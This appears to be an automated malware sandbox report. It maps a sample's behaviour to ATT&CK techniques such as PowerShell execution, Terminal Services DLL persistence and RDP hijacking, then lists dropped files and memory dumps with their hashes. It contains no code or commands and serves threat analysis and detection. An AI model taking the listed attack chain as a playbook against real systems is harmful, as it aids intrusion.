Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ali.xll

Filesize
478B

MD5
b4d19d9bc3a9710b2fb1ae0b624d1c41

SHA1
eeb5da66d4c03576e74ce3400a0e103c3d3ec03e

SHA256
149694d95fcdd48d6dc7d63c01277781fbf125e18021e053b33e3031e0b56ed2

SHA512
9e28bf58250c8f7a9c3678ea1e8e04c7c8a8f5d296a5aefd00e22cd2ea92e3290c7d97e3162c45c34b0e7df2d96da86e8eca7d06b29c727899ef49ed8e9838f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Cancello.xll

Filesize
6.0MB

MD5
94ebec40a2486771c57efa2fe07ae9da

SHA1
703f32b6c37b1911419d183f6f58b64c0eacdc65

SHA256
520f4f19ea3685af7c4ab2d80be0d1e25b1653a7b179aefee598c5d3982a7fb9

SHA512
9cf346200847548476a2b75d0abf763a06508d98d7e0f7eee6f42c92642852a4cb9e8315b05881336c16cf448e78bf60ca5ad3ea310744e692a08dad4eed9106

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mie.xll

Filesize
988KB

MD5
870915fb6864a3860eb0169eb2fb8189

SHA1
6554c843886613c7f13d83209459a32f6490341f

SHA256
e62d564f38ba39e66793ac9438f2d8349f7724ee781f29f7baa211a084d254c5

SHA512
eaa44787524ee4bc7fdf7a012d3bb916e7062ee5dc943ead0f6ada81ee42be1113f56735c3923e27edb938ea2e91ff031d09d8518ea68d3eda2b2098477fcfb9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vai.xll

Filesize
1.0MB

MD5
08f5912a8c695d475ecba490c52afd79

SHA1
bcd1446b4f5890ea711ff0da19c160d02208586e

SHA256
763e8f292c2cd633355cef302c05d61a95a0f3cde3d066256183fd6e070e8dd5

SHA512
83962e6336f61bb6d264a09e6ab5cad88961deb54046ee932df7cf5b395dbc87b644c0fd1e818c0c031674a432eeccb3e6af5f42be03bc5929656eaac1d1ff22

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESACB.tmp

Filesize
1KB

MD5
58a0c61c20098ca593ba3e67d9cbd17c

SHA1
4370b0c8af2b9dc05381facd8656fc0e01e21b69

SHA256
2e0bd638930cff3f1f3ed22f0555f5e5c58728db669610fd8d8854d6b12a8632

SHA512
72000b75e77bfe61d4b9fb86f69fcdea2a42d1b53cb88a7978a641634a150c4e8fb26bf0ab1d6edf0b88729e3f4bd830c6da71ade2f73b3dbde5b1a9974d1230

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1

Filesize
1KB

MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1

Filesize
2.5MB

MD5
d98e1585ada81949fd216a4cb47a57a2

SHA1
9bfe5e6aecbd1f6fea39a53f79949b0d08678ee5

SHA256
8ac0505a68a72081897e5bfb0fa2a7398700d01a081753b4b70da0a310d04a7b

SHA512
41b5a6f1e31622ac5629a211e60abdeba5fc1011ba2b3c1f5827d2efd1ed8b7ad6abc2faa42f55f4674ab08e88ba8959805dfc36ebd209f7e01b2c8b884862e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\zijqbzy6.dll

Filesize
3KB

MD5
bed74775c0e5cec6a34603980c5a7aac

SHA1
1a81ac54dcfc081f761f13ce70901e494aff5a27

SHA256
2944595a6aefea34523fc451812b200998b4dfd110974b27f24f6159833155cd

SHA512
be1582553f20c4f15772da444a2411df63c65b98155c5a295a723b570e522f998a0396365e9546f65110b3685fac2cb8022aa45433ee890beb2f63b273debf5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\zijqbzy6.pdb

Filesize
7KB

MD5
a02a8e65282023f7d83d9e581ddfd396

SHA1
7b8236e6c12149a337f933ed2afdaa45dc248858

SHA256
e8ba9055e5905cab3ea88d39326586940f50da9a97f1aca852507a770ad66cc0

SHA512
921f207f9775e8405034422c03a1156a62c69fe4d6d86bb3f4b8c29aad6852133865a9b8c67dd54994fd4dfa93f9da9bd7249de1531c71d7504d54b352fc9b94

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
00ffd56d36562f409290977785fc16de

SHA1
1ca3e51fbbfc92131c2dde9905961812cb8fede7

SHA256
07bada1017283007d74755e1365d6b44063b76a5c133862f93e2fae1558aeaf5

SHA512
5f4f60eac0aa39dc4231dd95375e1314edc8f02a8e6499e014e5ebf5182696851f4564c0fb9eb1045b20d32190f4626038b72938247817ca19addcf6090ae388

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCACA.tmp

Filesize
652B

MD5
684936a0be02b1bd774898b84d4bd87e

SHA1
56b6ef87af15aa95f0afa22c5e0f1d9d0500f9e3

SHA256
2b4345d1ce86f3f6817e259ee6e579a647299a181d661c1aca1980858a560be0

SHA512
241ec34ee386d167146e5770dbf83a3f7a4a8c1c2e537617f9b45859ff0adfd1f84ab28dc0f40cf7802e7d0ecf2d2602ecd8622a705d00ae3cb414232ef2e47b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zijqbzy6.0.cs

Filesize
424B

MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zijqbzy6.cmdline

Filesize
309B

MD5
2875f38b758b9b03cd8f8c7c95c01a6e

SHA1
5bd62d3c5a69b51e03a58e780983a08f1a105959

SHA256
97fd68f80f867743cae32d1074acffe86b697b795a85299862d98bdcb5de54e5

SHA512
2a91dfdf7ddfc67f2785dc4c5311979aafda1ed8bd22d7b75af01954e25e6f44162086ca5f6c9cd6a37cef7e31bd74c1730946067677fba5d927b74947430b6c

Download Submit
\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Mare.exe.com

Filesize
1.0MB

MD5
f83ab141e29899ceb5308dabde894a0e

SHA1
6ea46bb7102125fa5d39b77547dab28ec346e9f9

SHA256
ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99

SHA512
d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847

Download Submit
\Windows\Branding\mediasrv.png

Filesize
60KB

MD5
887d05438e05502e984ec2f4160c738b

SHA1
9c9a0f6cd829ddb8ed765db8aa47f451283f63ff

SHA256
e0593cae5c5fa1a2dc2012c49fe14dc6b1811fe28daaeb92d4fefe2673b57a24

SHA512
5ae8d6fe49ee4e490c9ba2f23f7b6be3a3e97ab720b03ff3e47d79d6bc2c3789f4d3d164b80390d1bdd8cdd4b1b8f4f4f12be2c110e48729db4fb5bea37227e8

Download Submit
\Windows\Branding\mediasvc.png

Filesize
743KB

MD5
6f81732c759f466521df693bd9df18f9

SHA1
dbb0d6a381bf80deabd3b5fb578d28c06ee50654

SHA256
6591a77683f361d0946c123b9c09b89ee92ba467f684cb1c110efe14b888d033

SHA512
a11296293262aa6a2a716205fd48b25a9865eb7130eba874ed2320bd5af2ba6be22e181e0139cb71758b53a004b542a93fc9b961dc4af6c204fe3364dd639570

Download Submit
memory/2864-62-0x0000000002CE0000-0x0000000002D12000-memory.dmp

Filesize
200KB

Download
memory/2864-42-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/2864-63-0x0000000002CE0000-0x0000000002D12000-memory.dmp

Filesize
200KB

Download
memory/2864-43-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2864-58-0x0000000002B20000-0x0000000002B28000-memory.dmp

Filesize
32KB

Download
memory/2964-27-0x00000000004D0000-0x0000000000B28000-memory.dmp

Filesize
6.3MB

Download
memory/2964-35-0x0000000042D40000-0x0000000043166000-memory.dmp

Filesize
4.1MB

Download
memory/2964-26-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

Filesize
4KB

Download
memory/2964-25-0x00000000004D0000-0x0000000000B28000-memory.dmp

Filesize
6.3MB

Download
memory/2964-34-0x00000000004D0000-0x0000000000B28000-memory.dmp

Filesize
6.3MB

Download
memory/2964-30-0x00000000004D0000-0x0000000000B28000-memory.dmp

Filesize
6.3MB

Download
memory/2964-32-0x00000000004D0000-0x0000000000B28000-memory.dmp

Filesize
6.3MB

Download
memory/2964-31-0x00000000004D0000-0x0000000000B28000-memory.dmp

Filesize
6.3MB

Download
memory/2964-33-0x00000000004D0000-0x0000000000B28000-memory.dmp

Filesize
6.3MB

Download
memory/2964-102-0x00000000004D0000-0x0000000000B28000-memory.dmp

Filesize
6.3MB

Download